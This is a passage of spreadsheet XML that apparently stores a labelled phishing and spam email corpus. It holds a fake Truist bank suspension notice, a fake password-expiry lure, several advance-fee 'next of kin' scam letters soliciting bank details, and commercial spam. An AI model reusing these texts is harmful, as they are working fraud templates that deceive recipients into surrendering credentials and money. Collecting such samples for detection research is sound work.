    <t>http://info.mail.yahoo.com</t>
  </si>
  <si>
    <t>1489</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Truist Alerts &lt;alertnotifications@message.truist-com&gt;\nDate: Tue, 13 Sep 2022 19:01:03 +0000</t>
  </si>
  <si>
    <t>Tue, 13 Sep 2022 19:01:03 +0000</t>
  </si>
  <si>
    <t>Truist Alerts &lt;alertnotifications@message.truist-com&gt;</t>
  </si>
  <si>
    <t>Access Locked</t>
  </si>
  <si>
    <t>Client Name:  N/A Your Online Banking Has Been Suspended  This is an automated message. Please do not reply directly to this email. Review the following and restore your account. Hello,You will not be able to Transfer/Withdraw funds from your account due to the following problems below: 1: Unverified Email Address 2: Invalid Home AddressWe strongly advise you to Click Here And Restore Your Account before 48hrs of receiving this warning notification.If you or an authorized user wants to deactivate your account permanently, no further action is required. All Fields Are Required.Thank you for choosing Truist.  Need additional assistance with mobile or online banking? Visit help &amp; support from the more menu in online banking or the mobile app. You can also make changes to your alerts preferences at any time in online banking or the app. If you found this email in your spam or junk, add alertnotifications@message.truist.com to your safe senders list.  Truist Client Commitment: Protecting your information and identity is our priority. Truist will never send unsolicited emails asking clients to provide, update or verify their personal or account information, such as passwords, Social Security numbers, personal identification numbers (PINs), credit or debit card numbers, or other confidential information. If you believe your account security has been compromised or have any concerns. Learn more about security at [URL]https://www.truist.com[/URL] or privacy at [URL]https://www.truist.com[/URL] Truist Bank, Member FDIC. ©2022 Truist Financial Corporation. Truist, SunTrust, BB&amp;T, Truist Purple, and the Truist logo are service marks of Truist Financial Corporation.</t>
  </si>
  <si>
    <t>https://www.truist.com https://www.truist.com</t>
  </si>
  <si>
    <t>1488</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Account Storage &lt;account.storage@tech-center.com&gt;\nDate: Tue, 13 Sep 2022 12:44:18 +0000 (UTC)</t>
  </si>
  <si>
    <t>Tue, 13 Sep 2022 12:44:18 +0000 (UTC)</t>
  </si>
  <si>
    <t>Account Storage &lt;account.storage@tech-center.com&gt;</t>
  </si>
  <si>
    <t>Password Reset Confirmation</t>
  </si>
  <si>
    <t>Account Storage *jose@monkey.org* Password has Expired To prevent deactivation of [ID] Click To update ( [URL]https://ipfs.io[/URL] ) © 2022 Email Support 3396 Green Mt Crossing Dr , Shiloh , IN 62269 Unsubscribe ( [URL]https://u28985254.ct.sendgrid.net[/URL] ) - Unsubscribe Preferences ( [URL]https://u28985254.ct.sendgrid.net[/URL] )                Account Storage               jose@monkey.org Password has Expired  To prevent deactivation of [ID]  Click To update  © 2022 Email Support                                                                                                               3396 Green Mt Crossing Dr, Shiloh, IN 62269             Unsubscribe                      -                        Unsubscribe Preferences</t>
  </si>
  <si>
    <t>https://ipfs.io https://u28985254.ct.sendgrid.net https://u28985254.ct.sendgrid.net</t>
  </si>
  <si>
    <t>1480</t>
  </si>
  <si>
    <t>To: nan\nFrom: Frank Michelle &lt;frankmichelle4@franksite.org&gt;\nDate: Tue, 13 Sep 2005 07:00:32 +0000</t>
  </si>
  <si>
    <t>Tue, 13 Sep 2005 07:00:32 +0000</t>
  </si>
  <si>
    <t>Frank Michelle &lt;frankmichelle4@franksite.org&gt;</t>
  </si>
  <si>
    <t>Urgent Attention.</t>
  </si>
  <si>
    <t>From:     Frank Michelle Esq.\n          London, U.K.\n          Telephone: +44 703 184 7859\n          Fax line: +44 709 287 0887\n          E-mail:barristertony@compaqnet.fr\n\nI must apologise for berging into your mailbox without a formal introduction \nof myself to you. Actually, I got your mailbox in the web while trying to \nget a good and capable business person in your country for both business and \ninvestment purposes.Let me start by introducing myself; I am  Barrister \nFrank Michelle (Esq) I was the Personal Attorney to late Mr. Morris Thompson \nan American who was a private businessman in my country unfortunately lost \nhis life in the plane crash of Alaska Airlines Flight 261 which crashed on \nJanuary 31st 2000, including his wife and only daughter.\n\nYou can read more about the crash on visiting these sites below,\n\n1. [URL]http://www.cnn.com[/URL]\n\n2. [URL]http://www.nativefederation.org[/URL]\n\nBefore the plane crash, Mr. Morris Thompson made a numbered fixed deposit \nfor 18 calendar months with a value of US$ 2,500,000.00 (TWO MILLION, FIVE \nHUNDRED THOUSAND UNITED STATE DOLLARS) in a bank here in U.K. Upon maturity \nseveral notice was sent to him, another notification was sent and still no \nresponse came from him. I later found out that Mr. Morris Thompson and his \nfamily had been killed in that plane crash. After further investigation it \nwas also discovered that Mr. Morris Thompson's  next of kin was his daughter \nwho died with him in the crash.\n\nWhat bothers me most is that according to the laws of my country at the \nexpiration of 5 years the funds will revert to the ownership of the U.K. \nGOVERNMENT, if nobody applies to claim the funds. Against this backdrop, my \nsuggestion to you is that I will like you as a foreigner to stand as the \nnext of kin to Mr. Morris Thompson so that you will be able to receive these \nfunds for both of us.\n\nWHAT IS TO BE DONE:-\n\nI want you to know that I have had everything planned out so that we shall \ncome out successfully. As a barrister, I will prepare the necessary document \nthat will back you up as the next of kin to Mr. Morris Thompson.\n\nPLEASE YOU HAVE TO PROVIDE YOUR FULL INFORMATION SUCH AS STATED BELOW,\n\n[1] NAME:\n\n[2] ADDRESS:\n\n[3] AGE:\n\n[4] SEX:\n\n[5] TELEPHONE:\n\n[6] FAX:\n\n[7] OCCUPATION STATUS:\n\nAlso be informed that this Transaction will take us just 15 working days to \naccomplish beginning from when I receive your Data's.After you have been \nmade the next of kin, I will also file an application to the bank on your \nbehalf as soon as I secure the necessary approval and letter of probate in \nyour favor for the movement of the funds to an account that will be provided \nby you. This process is 100% risk free as I have set out all the modalities \nto see that a legalized method is used because then I will prepare all the \nnecessary documents.\n\nPlease note that utmost secrecy and confidentiality is required at all times \nduring this transaction. Once the funds have been transferred into your \nnominated bank account we shall share in the ratio of 50% for me, 45% for \nyou and 5% set aside for any incidental expenses incurred during this \ntransaction. If you are not interested, please delete this letter so that I \ncan scout for another competent partner to conclude this transaction. Should \nyou be interested please send me your full names, telephone, fax number and \nemail address as stated above.  I will prefer that you reach me via this \nemail address:- frankmichelle@compaqnet.fr\n\nYour earliest response to this letter will be appreciated.\n\nKind Regards,\n\nFrank Michelle Esq.\n\n\n\n\n</t>
  </si>
  <si>
    <t>2960</t>
  </si>
  <si>
    <t>To: nan\nFrom: markwwww@terra.es &lt;markwwww@terra.es&gt;\nDate: Tue, 13 Mar 2007 16:12:18 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2007 16:12:18 +0100</t>
  </si>
  <si>
    <t>markwwww@terra.es &lt;markwwww@terra.es&gt;</t>
  </si>
  <si>
    <t>PLEASE HELP ME</t>
  </si>
  <si>
    <t>\nPLEASE HELP ME \nDear Friend, \n\nYou may be surprised to receive this letter, I got your contact through a desperate and personal search on the web for someone I could really trust as I have prayed over it and I wish to express my interest to handle this matter with you. \n\n\nLet me introduce myself to you before I go further; I am Mr. mark Abdul the son of late Mr. Abdul Kosoko who was recently murdered in the land dispute in Zimbabwe. I wouldn't go much deep detailing the problem I am having in my own country Zimbabwe, but you can have a look on This web-site;[URL]http://www.rte.ie[/URL] html, if you have the time you will understand the kind of brutal president we have.\n \n\nBefore the sudden death of my father, he foresees the looming danger in Zimbabwe and decided to make a deposit SUM OF$30 MILLION UNITED STATE DOLLARS(THIRTY MILLION US DOLLARS)in disguise as consignment in a box with a Security Company in European  . And he was forced to disclose this to me alone as his first son. And with faith, I am going to disclose the details to you,  hoping that you will understand me and keep the secret to yourself, and most importantly to stand as the beneficiary to this fund, so that non of my country people we have any reason to track this money back. \n\n\nThis money was deposited as family valuables due to the heat of the problem in Zimbabwe , so that the government will not try to confiscate the money if discovered. This amount was meant for the purchase of new machines and chemicals for the farms and also for the establishment of a new farm in Swaziland . The land disputes started when Zimbabwean President "MR. ROBERT MUGABE" introduced a new Land Act reform which wholly affected the rich white farmers and some few black farmers. This resulted to many killings by Zimbabwe war veterans and some lunatics in the society. In fact, a lot of people were killed because of this land reformed Act for which my Father was one of the victims. And because of this development I flew to Dubai to stay as a refugee. \n\n\n&gt;From the studies I have been able to make in Dubai concerning the right of a refugee, a lot of question will arise if I make any attempt to claim this fund directly concerning my age. And for the fact that I will not like to stay permanently in Dubai due to there law of not issuing permanent resident to foreigners. I am looking forward to stay in a country that the law will give me full right with time. And to have a good guardian that is knowledgeable in business and investment. It is just on this background that I have contacted you.\n\n\nPlease, I need your assistance to transfer this fund to your trusted overseas bank account as soon as it is being claim from the Security Company. For your efforts and assistance, I have agreed to give you 30% of the total sum, while 10% is mapped out to re-in-burse all the expenses incurred in the course of this transaction and 60% will be for me and my family investment in your country under your kind control. \n\n\nNote that this transaction is 100% clear and risk-free, as I have made every necessary arrangement for a successful deal base on the little advice my let father gave to me. The only thing am soliciting from you is the total assistance to make a claim of the fund on your name from the Security Company, and after which the money will be paid into your account in your country \n\n\nI need your complete trust and assurance that my own part of money will be safe when transferred to your account. Kindly keep this business proposal highly confidential for security reasons. If you are interested in assisting me, Reply via the above email address and include your private phone and fax numbers. I will respond to you immediately. \nLooking forward to your urgent reply, God Bless. \n\nSincerely Yours, \nMr. mark Abdul \n\n \n\n\n\n\n\nAhora tambi&amp;eacute;n puedes acceder a tu correo Terra desde el m&amp;oacute;vil.\n\nInf&amp;oacute;rmate pinchando aqu&amp;iacute;.\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>2959</t>
  </si>
  <si>
    <t>To: R@S\nFrom: BARRISTER GREG FRIGGS &lt;greg.frigg@yahoo.com.hk&gt;\nDate: Tue, 13 Mar 2007 13:25:30 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2007 13:25:30 +0100</t>
  </si>
  <si>
    <t>BARRISTER GREG FRIGGS &lt;greg.frigg@yahoo.com.hk&gt;</t>
  </si>
  <si>
    <t>Attention:\n\nI sincerely apologize for intruding into your privacy, especially by contacting you through this means for a business transaction of this magnitude, but due to its seriousness and urgency it therefore became necessary for me to seek for your assistance.\n\nA random draw conducted by our law firm, (Friggs &amp; Co Chambers,) in Lagos,Nigeria and Your name and e-mail address was selected. I am Barrister Greg Friggs, the Legal Adviser and counsel to a deceased expatriate contractor (Mr. Philip) who used to work with Zenith Oil and Gas Company here in Nigeria thereafter shall be referred as my late client. On the December 26th 2003, my client and his entire family died in a plane crash in cotonou, Benin Republic. You will read more stories about the crash on visiting this website: [URL]www.cnn.com[/URL]\n\nHe was a well known philanthropist before he died, he made a Will stating that $4.5m(Four Million Five Hundred Thousand USA Dollars Only) should be donated to any Philanthropist of our choice overseas.We have made a random draw where your name and e-mail address was picked as the beneficiary to this Will.\n\nI am particularly interested in securing this money from the bank,because they have issued a notice instructing us to produce the beneficiary of this Will within two weeks or else the money will be credited to the Government treasury as per law here. \n\nIt is my utmost desire to execute the Will of our late client (Mr.Philip) in your favour and therefore, you are required to contact me immediately to start the process of sending this money to any or your designated official account. \n\nPlease act fast and contact me via my private email address (gregfriggs1965@yahoo.com.cn)\n\nRegards,\n\nBarrister Greg Friggs\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>2205</t>
  </si>
  <si>
    <t>To: nan\nFrom: ben &lt;coroma@sunumail.sn&gt;\nDate: Tue, 13 Jun 2006 23:53:18 -0000</t>
  </si>
  <si>
    <t>Tue, 13 Jun 2006 23:53:18 -0000</t>
  </si>
  <si>
    <t>ben &lt;coroma@sunumail.sn&gt;</t>
  </si>
  <si>
    <t>&gt;From The Desk Of Ben Coroma Esq,\nSenior Staff In FileDepartment,\nAfrican Development Bank A.D.B\nOuagadougouBurkina-Faso West Africa.\nCall me with this number (00226-78857597)\nPLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL]\n\n        ("REMITTANCE OF $15 MILLION U.S.A   DOLLARS\n                            CONFIDENTIAL IS THECASE")\n\nCompliment Of The Season,\n\nOn a very good day. I am (Ben Coroma  Esq),asenior staff in file\ndepartment in African developent bank (ADB).I gotyour contact from a\ntourist from your country who was in this country and transacted a\nbusiness with our bank. When i was searching for aforeign partner i\nassured of your capability and reliability to champion this businees\nopportunity when i prayed to God or Allah about you.In my department we\ndiscovered an abandoned sum of $ 15 million U.S.A dollars( fifteen million\nU.S.A dollars) . In an account that belongs to one ofour foreign customer \nwho died along with his entire family in Monday 31st July 2000 in a plane\ncrash. Since we got information about his death, we have been expecting\nhis next of kin to come over and claim hismoney because we can not release\nit unless somebody applies for it asnext of kin or relation to the\ndeceased as indicated in our banking guidelines, but unfortunately we\nlearnt that all his supposed next ofkin or relation died along side with\nhim at the plane crash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that Iand one official in my\ndepartment now decided to make this businness proposal to you and release\nthe money to you as the next of kin or relation to the deceased for safety\nand subsequent disbursement since nobody is coming for it and we don.t\nwant this money to go into the bank treasury as unclaimed bill. The\nBanking law and guideline here stipulates that if such money\nremained unclamed after five years, the money will be transfered into the\nBank treasury as unclaimed fund. The request of foreigner as next of kin\nin this business is occasioned by the fact that the customer was a\nforeigner, and a Burkinabe cannot standas next of kin to a foreigner. We\nagree that 30 % of this money will befor you as foreign partner, in\nrespect to the provision of a foreign account, 10 % will be set aside for\nexpenses incured during the business and 60 % would be for me and my woman\ncolleague. There after I and my colleague will visit your country for\ndisbursement according to the percentages indicated.\n\nTherefore to enable the immediate trnansfer ofthis fund to you as\narranged, you must apply first to the bank asrelations or next of kin of\nthe deceased indicating your bank name, yourbank account number, your\nprivate telephone and fax number for easy and effective communication and\nlocation where the money will be remitted.\n\nUpon receipt of your reply, I will send to you by fax or emailthe text of\nthe application I will not fail to bring to your notice that this\ntransaction is hitch free and that you should not entertain any  atom of\nfear as all required arrangements have been made forthetransfer.\n\nYou should contact me on this email( (00226-7885 7597)immediately as soon\nas you receive this letter. Trusting to hear fromyou immediately.\n\nYour's faithfully,\n\n Ben Coroma  (Esq.)\n\nPOST SCRITUM:You have to keep everything secret as to enable the transfer\nto move very smoothly in to the account you will prove to the bank.As you\nfinished reading this letter call me immediately so that we discuss very\nwell over this business.Please call me and inform me that you received my\nmail, because i don't go to net always\n\n\n\n\n\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>2199</t>
  </si>
  <si>
    <t>To: nan\nFrom: naba mohammed &lt;naba_moha9@hotmail.fr&gt;\nDate: Tue, 13 Jun 2006 08:12:40 +0200</t>
  </si>
  <si>
    <t>Tue, 13 Jun 2006 08:12:40 +0200</t>
  </si>
  <si>
    <t>naba mohammed &lt;naba_moha9@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM:MR NABA MOHAMMED</t>
  </si>
  <si>
    <t>FROM:MR NABA MOHAMMED\nBILL AND EXCHANGE MANAGER,\nAFRICAN DEVELOPMENT BANK (A D B)\nOUAGADOUGOU BURKINA-FASO.\n\n\nDear Sir/Madam,\n\n                        (PRIVATE &amp; CONFIDENTIAL)\n\nI am NABA MOHAMMED the MANAGER in charge of BILL AND EXCHANGE section of \nAFRICAN DEVELOPMENT BANK (A D B) Ouagadougou Burkina-Faso in West \nAfrica.With due respect and egard I have decided to contact you on a \nbusiness transaction that will be very beneficial to both of us at the end \nof the transaction.\n\nDuring our investigation and auditing in this bank, my department came \nacross a very huge sum of money belonging to a deceased person who died on \nNovember  2001 in a plane crash and the fund has been dormant in his account \nwith this Bank without any claim of the fund in our custody either from his \nfamily or relation before my discovery to this development.\n\nAlthough personally, I keep this information secret within myself to enable \nthe whole plans and idea be Profitable and successful during the time of \nexecution. The said amount was sum of $ TWENTY TWO MILLION THREE HUNDRED \nTHOUSAND UNITED STATES DOLLARS ($22.3m)\n\nMeanwhile all the whole arrangement to put claim over this fund as the \nBonafide next of kin to the deceased, get the required approval and transfer \nthis money to a foreign account has been put in place and directives and \nneeded information will be relayed to you as soon as you indicate your \ninterest and willingness to assist me and also benefit your self to this \ngreat business opportunity.\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to the Bank and also present a foreign account where he will need the money \nto be re-transferred into on his request as it may be after due verification \nand clarification by the correspondent branch of the bank where the whole \nmoney will be remitted from to your own designation bank account.I don't \nwant this money to go into the Bank treasury as unclaimed Bill.Our Banking \nlaw and guideline here stipulates that if such money remained  unclaimed \nafter five years, the money will be transferred into the Bank  treasury as \nunclaimed fund.The request of  foreigner as next of kin in this business is \noccasioned by the fact that the customer was a foreigner and a Burkinabe \ncannot stand as next of kin to a foreigner.\n\nI will not fail to inform you that this transaction is 100% risk free. On \nsmooth conclusion of this transaction, you will be entitled to 30% of the \ntotal sum as gratification, while 5% will be set aside to take care of \nexpenses that may arise during the time of transfer and also telephone \nbills, while 65% will be for me. Please, you have been adviced to keep "top \nsecret" as I am still in service and intend to retire from service after I \nconclude this deal with you.\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n\nAll other necessary vital information will be sent to you when I hear from \nyou.\nI look forward to receive your email.\n\nYours faithfully,\nMr NABA MOHAMMED HOME ADDRESS:288 QUEAZIN\nFERDINAND AVENUE OUAGADOUGOU\nBURKINA-FASO.\n\n_________________________________________________________________\nMSN Hotmail sur i-mode : envoyez et recevez des e-mails depuis votre \ntlphone portable ! [URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>539</t>
  </si>
  <si>
    <t>To: nan\nFrom: George Nduumba &lt;georgenduumba@fsmail.net&gt;\nDate: Tue, 13 Jan 2004 15:41:20 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Jan 2004 15:41:20 +0100</t>
  </si>
  <si>
    <t>George Nduumba &lt;georgenduumba@fsmail.net&gt;</t>
  </si>
  <si>
    <t>Honest Appeal</t>
  </si>
  <si>
    <t>George Nduumba,\nAmsterdam, The Nederlands. \nTel: +31 629 315 463\n      \n                     CONFIDENTIAL BUSINESS PROPOSAL\nYou may be surprised to receive this letter from me since you do not know me personally.I got your contact through network online hence decided to write you. I should have notified you about it at least for the sake of your integrity. Please accept my apology. The purpose of my letter is to seek for foreign assistance with regards my late father money. My name is Laurent Nkono, the first son of  Nkono Banjul ,one of the most popular black farmer in Zimbabwe who was recently murdered in the land dispute in my country.\nThis land problem came when Zimbabwean President Mr. Robert Mugabe introduced a new Land Act Reform wholly affecting the rich white farmers and some few black farmers, and this resulted to the killing and mob action by Zimbabwean war veterans and some lunatics in the society. In fact a lot of people were killed because of this Land reform Act for which my father was one of the victims. . It is against this background that, I and my family fled Zimbabwe for fear of our lives and are currently staying in the Netherlands where we are seeking political asylum.\nBefore the death of my father, he had taken me to Johannesburg to deposit the sum of US8.5 million (Eight million, Five Hundred thousand United States dollars), in one of the private security company, as he foresaw the looming danger in Zimbabwe this money was deposited in a box as gem stones to avoid much demurrage from security company. This amount was meant for the purchase of new machines and chemicals for the Farms and establishment of new farms in Swaziland. \nNow the family have decided to transfer my father's money to a more reliable foreign account. since the law of Netherlands prohibits a refugee (asylum seeker) to open any bank account or to be involved in any financial transaction throughout the territorial zone of Netherlands, As the eldest son of my father, I am saddled with the responsibility of seeking a genuine foreign account where this money could be transferred without the knowledge of my government who are bent on taking everything we have got. The South African government seems to be playing along with them hence I am faced with the dilemma of moving this amount of money out of South Africa for fear of going through the same experience in future and as you are aware both countries have similar political history. As a businessman, I am seeking for a partner who I have to entrust my future and that of my family in his hands, I must let you know that this transaction is risk free. Due to my current status in the Netherlands My lawyers shall work on my behalf to complete this transaction with you.\n \nIf you accept to assist me and my family, all I want you to do for me, is to make an arrangements with the security company to clear the consignment(funds) from their affiliate office here in the Netherlands as I have already given directives for the consignment to be brought to the Netherlands from South Africa. But before then all modalities will have to be put in place like change of ownership to the consignment and more importantly a concrete arrangement for the investment of part of the funds thereafter the clearance from the Security Company. \nI have two options for you. Firstly you can choose to have your percentage of the money immediately after the funds hit your account, or you can go into partnership with me for the proper profitable investment of the money in your country. Whichever the option you want, it is opened for negotiation. \nI have also mapped out 5% of this money for all kinds of expenses incurred in the process of this transaction. If you do not prefer a partnership I am willing to give you 15% of the money while the remaining 80% will be for my investment in your country. Please contact me as soon a possible via the above email address,  while I implore you to maintain the absolute secrecy required in this transaction.\n\nThanks, GOD BLESS YOU \nYours Faithfully, \nGeorge Nduumba. \nFreeserve AnyTime - HALF PRICE for the first 3 months - Save £7.50 a month \n[URL]www.freeserve.com[/URL]</t>
  </si>
  <si>
    <t>4570</t>
  </si>
  <si>
    <t>To: &lt;vty3876@freemail.com.au&gt;\nFrom: vty3876@freemail.com.au\nDate: Tue, 13 Feb 2001 10:04:28 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 10:04:28 -0500</t>
  </si>
  <si>
    <t>vty3876@freemail.com.au</t>
  </si>
  <si>
    <t>&lt;vty3876@freemail.com.au&gt;</t>
  </si>
  <si>
    <t>Get Out of Debt Fast                          12244</t>
  </si>
  <si>
    <t>More Than $2500 in DEBT?\n\nWe Can Help You PAY-OFF Your BILLS!!\nClick here for your FREE Consultation!!\n[URL]http://mysprintfast.com[/URL]\n\n~Cut your monthly payments by 50% or even more...\n~Stop paying Creditors high interest rates?\n~Better Manage your Financial Situation...Keep More Cash every Month!\n~We can Help STOP any Creditor Harassment!\n~Consolidate Regardless of past Credit History!\n\nQuick - Confidential - No Obligations -\nClick on the link below to get started!!\n[URL]http://mysprintfast.com[/URL]\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nTo be removed from all further mailings, \nplease send a message to: 457remove@webs.mysprintfast.com \nWe honor all remove requests.</t>
  </si>
  <si>
    <t>http://mysprintfast.com http://mysprintfast.com</t>
  </si>
  <si>
    <t>4569</t>
  </si>
  <si>
    <t>To: &lt;kamar@meishi.co.jp&gt;\nFrom: kamar@meishi.co.jp\nDate: Tue, 13 Feb 2001 02:49:27 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 02:49:27 -0500</t>
  </si>
  <si>
    <t>kamar@meishi.co.jp</t>
  </si>
  <si>
    <t>&lt;kamar@meishi.co.jp&gt;</t>
  </si>
  <si>
    <t>Spectrum Invites You With Open Arms                         25336</t>
  </si>
  <si>
    <t>Unbelievable Prices On Cell Phones And Accessories:\n\n[URL]http://www.chinaniconline.com[/URL]\n\nHands Free Ear Buds 1.99! \nPhone Holsters 1.98! \nPhone Cases 1.98! \nCar Chargers 1.98! \nFace Plates As Low As 2.98! \nLithium Ion Batteries As Low As 6.94! \n\n[URL]http://www.chinaniconline.com[/URL]\n\nClick Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, \nSAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below \nWHOLESALE PRICES!\n \n[URL]http://www.chinaniconline.com[/URL]\n\n***NEW*** Now Also: Accessories For PALM III, PALM VII, \nPALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** \n\nCar Chargers 6.95! \nLeather Cases 13.98! \nUSB Chargers 11.98! \nHot Sync Cables11.98! \n\n[URL]http://www.chinaniconline.com[/URL]\n\n***If You Need Assistance Please Call Us  (732) 751-1457***\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nTo be removed from future mailings please send your remove \nrequest to: removemenow68994@btamail.net.cn \nThank You and have a super day :)</t>
  </si>
  <si>
    <t>http://www.chinaniconline.com http://www.chinaniconline.com http://www.chinaniconline.com http://www.chinaniconline.com</t>
  </si>
  <si>
    <t>2504</t>
  </si>
  <si>
    <t>To: nan\nFrom: Lehadi Consultancy &lt;lehadiconsultancy@ds24.at&gt;\nDate: Tue, 12 Sep 2006 23:07:59 -0400</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2006 23:07:59 -0400</t>
  </si>
  <si>
    <t>Lehadi Consultancy &lt;lehadiconsultancy@ds24.at&gt;</t>
  </si>
  <si>
    <t>CONTRACT</t>
  </si>
  <si>
    <t>X-Mailer: HiveMail 1.2.2\n\nDate: Mon, 11 Sep 2006 07:44:33 +0200\n\nX-Priority: 3\n\nX-Originating-IP: 81.91.228.4\n\nContent-Type: multipart/mixed;\n\n              boundary="==Multipart_Boundary_xff93b252ec67027c713b2b07565dc314x"\n\nThis is a multi-part message in MIME format.\n\n\n\n--==Multipart_Boundary_xff93b252ec67027c713b2b07565dc314x\n\nContent-Type: text/plain; charset="iso-8859-1"\n\nContent-Transfer-Encoding: 7bit\n\n\n\nRainbow International Consultancy Sarl,\n\n02 BP 1247, Fidjrosse \n\nCotonou - Benin\n\n\n\nDear Sir/\n\n\n\nIt gives me the responsibility and keen interest to crave\n\nyour indulgence with this offer. I am financial consultant\n\nbased in the Republic of Benin.\n\n\n\nProposition: My late client is having some funds\n\n(US$12.4 million) with a Depository Trust Company which\n\nhe intended to invest in a free banking state. But his sudden\n\ndeath truncated his Investment plans. Due to his political\n\nposition before his death, nobody was aware of these funds\n\nat the Depository Trust Company except me, his financial\n\nconsultant.\n\n\n\nMy confidence is that after the death of my client, I have\n\nwaited for a couple of years but no one has shown up to\n\ninquire about these funds and i cannot afford to loose the\n\nfunds to the Depository Trust Company. Hence I will require\n\nyour full cooperation with a sincere heart to assist me in\n\nclaiming the funds from the holding firm and move them\n\nabroad for disbursement. As an insider, I have the necessary\n\ninformation required to claim the funds.\n\n\n\nWe will commence as soon as I read your favourable response.\n\n\n\nThanks for your understanding.\n\n\n\nCordially,\n\n\n\nDr Lehadi ADJOVI\n\n\n\nPrincipal Consultant\n\n\n\n\n\n\n\n-----------------------------------------------------\n\nKostenlose eMail-Adresse von [URL]www.ds24.at[/URL]\n\n-----------------------------------------------------\n\nkostenloser Counter von [URL]www.gratiscounter.at[/URL]\n\n-----------------------------------------------------\n\n\n\n--==Multipart_Boundary_xff93b252ec67027c713b2b07565dc314x--\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.ds24.at www.gratiscounter.at</t>
  </si>
  <si>
    <t>2497</t>
  </si>
  <si>
    <t>To: nan\nFrom: sudiq bawa &lt;sudiq_bawa9@hotmail.fr&gt;\nDate: Tue, 12 Sep 2006 03:19:12 +0200</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2006 03:19:12 +0200</t>
  </si>
  <si>
    <t>sudiq bawa &lt;sudiq_bawa9@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM MR SUDIQ  BAWA</t>
  </si>
  <si>
    <t>FROM MR SUDIQ  BAWA\nBILL AND EXCHANGE MANAGER\nFOREIGN REMITTANCE DEPT.\nBANK OF AFRICA (B.O.A)\nOUAGADOUGOU,BURKINA FASO.\n\n\nDear Friend,\n\nI am MR SUDIQ BAWA, The Bill and Exchange Manager at the Foreign Remittance \nDepartment of Bank Of AFRICA  (BOA).  I  have an urgent and very \nconfidential business proposition for you.\n\nOn october 6, 2002, an American Geologist/Contractor with  the Economic \nCommunity Of West African States (ECOWAS), Dr. George W.Brumley From \nAtlanta,U.S.A Deposited the sum of US$15,500,000.00 (Fiften million Five \nhundred thousand Dollars only) in my bank. Upon maturity,I sent aroutine  \nnotification to his forwarding address but got no reply. After a month, we  \nsent a reminder and finally we discovered from his contract employers, the \nEconomic Community Of West Africa States (ECOWAS) that Dr George W.Brumley \ndied in a plane crash with his intire family in Kenya,East Africa in the \nyear 2003.\n\nI want you to visit the website below for more information about the Plane \nCrash:\n\n[URL]http://www.wral.com[/URL]\n[URL]http://www.cnn.com[/URL]\n\nI therefore made further investigation and discovered that In the bank form \nfor next of kin, George W.Brumley Before his death filled his wife JEAN \nBRUMLEY as his next of kin but unfortunately, the wife died with him along \nothers and therefore, there is nobody left behind to claim the fund of\nDr. George Brumley as his next of kin that was why I contacted you and \nproposed it as a deal between us.\n\nMeanwhile, Official documents, including his Bank Deposit paperwork in my \nBank as the next of kin was in the name of his wife. Based on that, No one \nwill ever come forward to claim it.According to the Burkina Faso Law,under \nBurkina's foreign and defense affairs,at the expirationof 3 (Three) \nyears,such funds will revert to the ownership of the Burkina Faso Government \nfor financing military operations,such as purchasing of arms and ammunitions \nfor the military.\n\nIn order to avert this negative development, I will like to seek for your \npermission as a foreigner to stand as the next of kin to Dr.George W.Brumley \nso that the fruits of this old man's labor will not be use for financing \nweapons which will further enhance the courses of war in the world in \ngeneral.\n\nThe money will be paid into your account for us to share in the ratio of 55% \nfor me and 40% for you and 5% for Expenses Incurred in the course of the \ntransaction.There is no risk at all as all the paperwork  for this \ntransaction will be done accordingly and with my position as the bill and \nexchange guarantees the successful execution of this transaction.\n\nIf you are interested, please reply immediately through my private e-mail \naddress: by indicating your bank name and address, Account number, phone and \nfax number for easy communication. Upon your response, I shall then provide \nyou with more  details and that will help you understand the\ntransaction and also give you the text of the application to fill and send \nto the bank.\n\nFinally, You should observe utmost confidentiality, and rest assured  that \nthis  transaction would be most profitable for both of us because I shall \nrequire your assistance to invest my share in your country.\n\nAnxiously Awaiting for your urgent response.\n\nThanks and best regards to your family.\nFROM MR SUDIQ  BAWA\nBANK OF AFRICA (B.O.A)\n\n_________________________________________________________________\nDcouvrez Windows Live Messenger : le futur de MSN Messenger ! \n[URL]www.windowslivemessenger.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.wral.com http://www.cnn.com www.windowslivemessenger.fr</t>
  </si>
  <si>
    <t>945</t>
  </si>
  <si>
    <t>To: nan\nFrom: wangqin67 &lt;wangqin67@3xl.net&gt;\nDate: Tue, 12 Oct 2004 21:42:58 -0400</t>
  </si>
  <si>
    <t>Tue, 12 Oct 2004 21:42:58 -0400</t>
  </si>
  <si>
    <t>wangqin67 &lt;wangqin67@3xl.net&gt;</t>
  </si>
  <si>
    <t>CAN YOU BE SINCERE</t>
  </si>
  <si>
